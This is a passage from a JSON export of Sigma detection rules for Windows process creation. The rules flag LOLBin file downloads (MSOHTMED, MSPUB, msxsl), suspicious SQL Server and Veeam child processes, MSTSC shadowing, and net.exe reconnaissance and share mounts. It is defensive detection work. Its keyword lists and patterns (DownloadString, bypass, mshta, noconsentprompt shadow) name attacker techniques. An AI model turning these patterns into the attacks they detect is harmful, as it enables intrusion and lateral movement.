    "content": "title: Windows MSIX Package Support Framework AI_STUBS Execution\nid: af5732ed-764e-489d-826d-0447c8b36242\nstatus: experimental\ndescription: |\n    Detects execution of Advanced Installer MSIX Package Support Framework (PSF) components, specifically AI_STUBS executables with original filename 'popupwrapper.exe'.\n    This activity may indicate malicious MSIX packages build with Advanced Installer leveraging the Package Support Framework to bypass application control restrictions.\nreferences:\n    - https://redcanary.com/blog/threat-intelligence/msix-installers/\n    - https://redcanary.com/threat-detection-report/techniques/installer-packages/\n    - https://learn.microsoft.com/en-us/windows/msix/package/package-support-framework\n    - https://www.splunk.com/en_us/blog/security/msix-weaponization-threat-detection-splunk.html\nauthor: Michael Haag, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-03\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\n    - attack.t1553.005\n    - attack.t1204.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\AI_STUBS\\AiStubX64Elevated.exe'\n            - '\\AI_STUBS\\AiStubX86Elevated.exe'\n            - '\\AI_STUBS\\AiStubX64.exe'\n            - '\\AI_STUBS\\AiStubX86.exe'\n        OriginalFileName: 'popupwrapper.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate applications packaged with Advanced Installer using Package Support Framework\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msohtmed_download.yml",
    "content": "title: Arbitrary File Download Via MSOHTMED.EXE\nid: 459f2f98-397b-4a4a-9f47-6a5ec2f1c69d\nstatus: test\ndescription: Detects usage of \"MSOHTMED\" to download arbitrary files\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/238/files\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\MSOHTMED.exe'\n        - OriginalFileName: 'MsoHtmEd.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'ftp://'\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mspub_download.yml",
    "content": "title: Arbitrary File Download Via MSPUB.EXE\nid: 3b3c7f55-f771-4dd6-8a6e-08d057a17caf\nstatus: test\ndescription: Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/pull/238/files\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-19\nmodified: 2023-02-08\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\MSPUB.exe'\n        - OriginalFileName: 'MSPUB.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'ftp://'\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msra_process_injection.yml",
    "content": "title: Potential Process Injection Via Msra.EXE\nid: 744a188b-0415-4792-896f-11ddb0588dbc\nstatus: test\ndescription: Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics\nreferences:\n    - https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/\n    - https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf\nauthor: Alexander McDonald\ndate: 2022-06-24\nmodified: 2023-02-03\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\msra.exe'\n        ParentCommandLine|endswith: 'msra.exe'\n        Image|endswith:\n            - '\\arp.exe'\n            - '\\cmd.exe'\n            - '\\net.exe'\n            - '\\netstat.exe'\n            - '\\nslookup.exe'\n            - '\\route.exe'\n            - '\\schtasks.exe'\n            - '\\whoami.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Msra.exe\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml",
    "content": "title: Detection of PowerShell Execution via Sqlps.exe\nid: 0152550d-3a26-4efd-9f0e-54a0b28ae2f3\nstatus: test\ndescription: |\n  This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\n  Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\nreferences:\n    - https://learn.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/\n    - https://twitter.com/bryon_/status/975835709587075072\nauthor: 'Agro (@agro_sev) oscd.community'\ndate: 2020-10-10\nmodified: 2022-12-09\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\sqlps.exe'\n    selection_image:\n        - Image|endswith: '\\sqlps.exe'\n        - OriginalFileName: 'sqlps.exe'\n    filter_image:\n        ParentImage|endswith: '\\sqlagent.exe'\n    condition: selection_parent or (selection_image and not filter_image)\nfalsepositives:\n    - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml",
    "content": "title: SQL Client Tools PowerShell Session Detection\nid: a746c9b8-a2fb-4ee5-a428-92bee9e99060\nstatus: test\ndescription: |\n  This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\n  Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\nreferences:\n    - https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml\n    - https://twitter.com/pabraeken/status/993298228840992768\nauthor: 'Agro (@agro_sev) oscd.communitly'\ndate: 2020-10-13\nmodified: 2022-02-25\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1127\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\sqltoolsps.exe'\n        - ParentImage|endswith: '\\sqltoolsps.exe'\n        - OriginalFileName: '\\sqltoolsps.exe'\n    filter:\n        ParentImage|endswith: '\\smss.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mssql_susp_child_process.yml",
    "content": "title: Suspicious Child Process Of SQL Server\nid: 869b9ca7-9ea2-4a5a-8325-e80e62f75445\nrelated:\n    - id: 344482e4-a477-436c-aa70-7536d18a48c7\n      type: obsolete\nstatus: test\ndescription: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.\nreferences:\n    - Internal Research\nauthor: FPT.EagleEye Team, wagga\ndate: 2020-12-11\nmodified: 2023-05-04\ntags:\n    - attack.t1505.003\n    - attack.t1190\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\sqlservr.exe'\n        Image|endswith:\n            # You can add other uncommon or suspicious processes\n            - '\\bash.exe'\n            - '\\bitsadmin.exe'\n            - '\\cmd.exe'\n            - '\\netstat.exe'\n            - '\\nltest.exe'\n            - '\\ping.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\sh.exe'\n            - '\\systeminfo.exe'\n            - '\\tasklist.exe'\n            - '\\wsl.exe'\n    filter_optional_datev:\n        ParentImage|startswith: 'C:\\Program Files\\Microsoft SQL Server\\'\n        ParentImage|endswith: 'DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe'\n        Image: 'C:\\Windows\\System32\\cmd.exe'\n        CommandLine|startswith: '\"C:\\Windows\\system32\\cmd.exe\" '\n    condition: selection and not 1 of filter_optional_*\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml",
    "content": "title: Suspicious Child Process Of Veeam Dabatase\nid: d55b793d-f847-4eea-b59a-5ab09908ac90\nrelated:\n    - id: 869b9ca7-9ea2-4a5a-8325-e80e62f75445\n      type: similar\nstatus: test\ndescription: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.\nreferences:\n    - https://labs.withsecure.com/publications/fin7-target-veeam-servers\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-04\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\sqlservr.exe'\n        ParentCommandLine|contains: 'VEEAMSQL'\n    selection_child_1:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wsl.exe'\n            - '\\wt.exe'\n        CommandLine|contains:\n            - '-ex '\n            - 'bypass'\n            - 'cscript'\n            - 'DownloadString'\n            - 'http://'\n            - 'https://'\n            - 'mshta'\n            - 'regsvr32'\n            - 'rundll32'\n            - 'wscript'\n            - 'copy '\n    selection_child_2:\n        Image|endswith:\n            - '\\net.exe'\n            - '\\net1.exe'\n            - '\\netstat.exe'\n            - '\\nltest.exe'\n            - '\\ping.exe'\n            - '\\tasklist.exe'\n            - '\\whoami.exe'\n    condition: selection_parent and 1 of selection_child_*\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml",
    "content": "title: Potential MSTSC Shadowing Activity\nid: 6ba5a05f-b095-4f0a-8654-b825f4f16334\nstatus: test\ndescription: Detects RDP session hijacking by using MSTSC shadowing\nreferences:\n    - https://twitter.com/kmkz_security/status/1220694202301976576\n    - https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-01-24\nmodified: 2023-02-05\ntags:\n    - attack.lateral-movement\n    - attack.t1563.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - 'noconsentprompt'\n            - 'shadow:'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mstsc_remote_connection.yml",
    "content": "title: New Remote Desktop Connection Initiated Via Mstsc.EXE\nid: 954f0af7-62dd-418f-b3df-a84bc2c7a774\nstatus: test\ndescription: |\n    Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\n    Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc\nauthor: frack113\ndate: 2022-01-07\nmodified: 2024-06-04\ntags:\n    - attack.lateral-movement\n    - attack.t1021.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mstsc.exe'\n        - OriginalFileName: 'mstsc.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' /v:'\n    filter_optional_wsl:\n        # Example: mstsc.exe /v:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /hvsocketserviceid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /silent /wslg /plugin:WSLDVC /wslgsharedmemorypath:WSL\\XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\\wslg C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp\n        ParentImage: 'C:\\Windows\\System32\\lxss\\wslhost.exe'\n        CommandLine|contains: 'C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - WSL (Windows Sub System For Linux)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml",
    "content": "title: Mstsc.EXE Execution With Local RDP File\nid: 5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af\nstatus: test\ndescription: Detects potential RDP connection via Mstsc using a local \".rdp\" file\nreferences:\n    - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/\n    - https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/\nauthor: Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock\ndate: 2023-04-18\nmodified: 2023-04-30\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mstsc.exe'\n        - OriginalFileName: 'mstsc.exe'\n    selection_cli:\n        CommandLine|endswith:\n            - '.rdp'\n            - '.rdp\"'\n    filter_optional_wsl:\n        ParentImage: 'C:\\Windows\\System32\\lxss\\wslhost.exe'\n        CommandLine|contains: 'C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely with legitimate usage of \".rdp\" files\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml",
    "content": "title: Suspicious Mstsc.EXE Execution With Local RDP File\nid: 6e22722b-dfb1-4508-a911-49ac840b40f8\nstatus: test\ndescription: Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.\nreferences:\n    - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/\n    - https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-18\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\mstsc.exe'\n        - OriginalFileName: 'mstsc.exe'\n    selection_extension:\n        CommandLine|endswith:\n            - '.rdp'\n            - '.rdp\"'\n    selection_paths:\n        # Note: This list of paths is better transformed into a whitelist where you only exclude legitimate locations you use in your env\n        CommandLine|contains:\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\System32\\spool\\drivers\\color'\n            - ':\\Windows\\System32\\Tasks_Migrated '\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - ':\\Windows\\Tracing\\'\n            - '\\AppData\\Local\\Temp\\'\n            # - '\\Desktop\\' # Could be source of FP depending on the environment\n            - '\\Downloads\\' # Could be source of FP depending on the environment\n    condition: all of selection_*\nfalsepositives:\n    - Likelihood is related to how often the paths are used in the environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml",
    "content": "title: Mstsc.EXE Execution From Uncommon Parent\nid: ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6\nstatus: test\ndescription: Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.\nreferences:\n    - https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/\n    - https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-18\ntags:\n    - attack.lateral-movement\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith:\n            # Covers potential downloads/clicks from browsers\n            - '\\brave.exe'\n            - '\\CCleanerBrowser.exe'\n            - '\\chrome.exe'\n            - '\\chromium.exe'\n            - '\\firefox.exe'\n            - '\\iexplore.exe'\n            - '\\microsoftedge.exe'\n            - '\\msedge.exe'\n            - '\\opera.exe'\n            - '\\vivaldi.exe'\n            - '\\whale.exe'\n            # Covers potential downloads/clicks from email clients\n            - '\\outlook.exe'\n    selection_img:\n        - Image|endswith: '\\mstsc.exe'\n        - OriginalFileName: 'mstsc.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msxsl_execution.yml",
    "content": "title: Msxsl.EXE Execution\nid: 9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0\nstatus: test\ndescription: |\n    Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files.\n    Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/\nauthor: Timur Zinniatullin, oscd.community\ndate: 2019-10-21\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.t1220\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msxsl.exe'\n    condition: selection\nfalsepositives:\n    - Msxsl is not installed by default and is deprecated, so unlikely on most systems.\n# Note: If you levreage this utility please consider adding additional filters. As this is looking for \"any\" type of execition\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_msxsl_remote_execution.yml",
    "content": "title: Remote XSL Execution Via Msxsl.EXE\nid: 75d0a94e-6252-448d-a7be-d953dff527bb\nstatus: test\ndescription: Detects the execution of the \"msxsl\" binary with an \"http\" keyword in the command line. This might indicate a potential remote execution of XSL files.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.t1220\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msxsl.exe'\n        CommandLine|contains: 'http'\n    condition: selection\nfalsepositives:\n    - Msxsl is not installed by default and is deprecated, so unlikely on most systems.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml",
    "content": "title: Suspicious Group And Account Reconnaissance Activity Using Net.EXE\nid: d95de845-b83c-4a9a-8a6a-4fc802ebf6c0\nstatus: test\ndescription: |\n    Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE\n    Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)\nreferences:\n    - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/\n    - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/\n    - https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/\nauthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)\ndate: 2019-01-16\nmodified: 2023-03-02\ntags:\n    - attack.discovery\n    - attack.t1087.001\n    - attack.t1087.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    # Covers group and localgroup flags\n    selection_group_root:\n        CommandLine|contains:\n            - ' group '\n            - ' localgroup '\n    selection_group_flags:\n        CommandLine|contains:\n            # Add more groups for other languages\n            - 'domain admins'\n            - ' administrator' # Typo without an 'S' so we catch both\n            - ' administrateur' # Typo without an 'S' so we catch both\n            - 'enterprise admins'\n            - 'Exchange Trusted Subsystem'\n            - 'Remote Desktop Users'\n            - 'Utilisateurs du Bureau à distance' # French for \"Remote Desktop Users\"\n            - 'Usuarios de escritorio remoto' # Spanish for \"Remote Desktop Users\"\n            - ' /do' # short for domain\n    filter_group_add:\n        # This filter is added to avoid the potential case where the point is not recon but addition\n        CommandLine|contains: ' /add'\n    # Covers 'accounts' flag\n    selection_accounts_root:\n        CommandLine|contains: ' accounts '\n    selection_accounts_flags:\n        CommandLine|contains: ' /do' # short for domain\n    condition: selection_img and ((all of selection_group_* and not filter_group_add) or all of selection_accounts_*)\nfalsepositives:\n    - Inventory tool runs\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_share_unmount.yml",
    "content": "title: Unmount Share Via Net.EXE\nid: cb7c4a03-2871-43c0-9bbb-18bbdb079896\nstatus: test\ndescription: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md\nauthor: oscd.community, @redcanary, Zach Stanford @svch0st\ndate: 2020-10-08\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.t1070.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'share'\n            - '/delete'\n    condition: all of selection*\nfalsepositives:\n    - Administrators or Power users may remove their shares via cmd line\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_start_service.yml",
    "content": "title: Start Windows Service Via Net.EXE\nid: 2a072a96-a086-49fa-bcb5-15cc5a619093\nstatus: test\ndescription: Detects the usage of the \"net.exe\" command to start a service using the \"start\" flag\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md\nauthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community\ndate: 2019-10-21\nmodified: 2023-03-05\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains: ' start '     # space character after the 'start' keyword indicates that a service name follows, in contrast to `net start` discovery expression\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrator or user executes a service for legitimate reasons.\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_stop_service.yml",
    "content": "title: Stop Windows Service Via Net.EXE\nid: 88872991-7445-4a22-90b2-a3adadb0e827\nrelated:\n    - id: eb87818d-db5d-49cc-a987-d5da331fbd90\n      type: obsolete\nstatus: test\ndescription: Detects the stopping of a Windows service via the \"net\" utility.\nreferences:\n    - https://ss64.com/nt/net-service.html\nauthor: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-05\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n    selection_cli:\n        CommandLine|contains: ' stop '\n    condition: all of selection_*\nfalsepositives:\n    - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_use_mount_admin_share.yml",
    "content": "title: Windows Admin Share Mount Via Net.EXE\nid: 3abd6094-7027-475f-9630-8ab9be7b9725\nrelated:\n    - id: f117933c-980c-4f78-b384-e3d838111165\n      type: similar\nstatus: test\ndescription: Detects when an admin share is mounted using net.exe\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\nauthor: oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga\ndate: 2020-10-05\nmodified: 2023-02-21\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' use '\n            - ' \\\\\\\\*\\\\*$'\n    condition: all of selection_*\nfalsepositives:\n    - Administrators\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_use_mount_internet_share.yml",
    "content": "title: Windows Internet Hosted WebDav Share Mount Via Net.EXE\nid: 7e6237fe-3ddb-438f-9381-9bf9de5af8d0\nstatus: test\ndescription: Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-21\nmodified: 2023-07-25\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' use '\n            - ' http'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_use_mount_share.yml",
    "content": "title: Windows Share Mount Via Net.EXE\nid: f117933c-980c-4f78-b384-e3d838111165\nrelated:\n    - id: 3abd6094-7027-475f-9630-8ab9be7b9725\n      type: similar\nstatus: test\ndescription: Detects when a share is mounted using the \"net.exe\" utility\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-02\nmodified: 2023-02-21\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains:\n            - ' use '\n            - ' \\\\\\\\'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate activity by administrators and scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_use_network_connections_discovery.yml",
    "content": "title: System Network Connections Discovery Via Net.EXE\nid: 1c67a717-32ba-409b-a45d-0fb704a73a81\nstatus: test\ndescription: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery\nauthor: frack113\ndate: 2021-12-10\nmodified: 2023-02-21\ntags:\n    - attack.discovery\n    - attack.t1049\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        - CommandLine|endswith:\n              - ' use'\n              - ' sessions'\n        - CommandLine|contains:\n              - ' use '\n              - ' sessions '\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_use_password_plaintext.yml",
    "content": "title: Password Provided In Command Line Of Net.EXE\nid: d4498716-1d52-438f-8084-4a603157d131\nstatus: test\ndescription: Detects a when net.exe is called with a password in the command line\nreferences:\n    - Internal Research\nauthor: Tim Shelton (HAWK.IO)\ndate: 2021-12-09\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1078\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\net.exe'\n              - '\\net1.exe'\n        - OriginalFileName:\n              - 'net.exe'\n              - 'net1.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - ' use '\n            - ':*\\\\'\n            - '/USER:* *'\n    filter_main_empty:\n        CommandLine|endswith: ' '\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_net_user_add.yml",
